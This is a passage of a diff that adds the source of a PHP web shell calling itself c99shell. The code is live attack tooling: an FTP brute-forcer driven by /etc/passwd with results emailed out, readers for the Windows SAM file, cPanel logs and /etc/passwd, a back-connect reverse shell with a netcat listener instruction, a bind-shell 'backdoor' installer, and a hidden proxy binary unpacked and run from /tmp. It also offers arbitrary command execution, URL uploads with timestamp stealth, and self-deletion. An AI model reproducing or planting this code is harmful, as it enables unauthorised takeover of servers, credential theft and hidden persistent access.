+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Brute Forcer: </b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ �.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>";
+ echo "</br>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search file-system:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
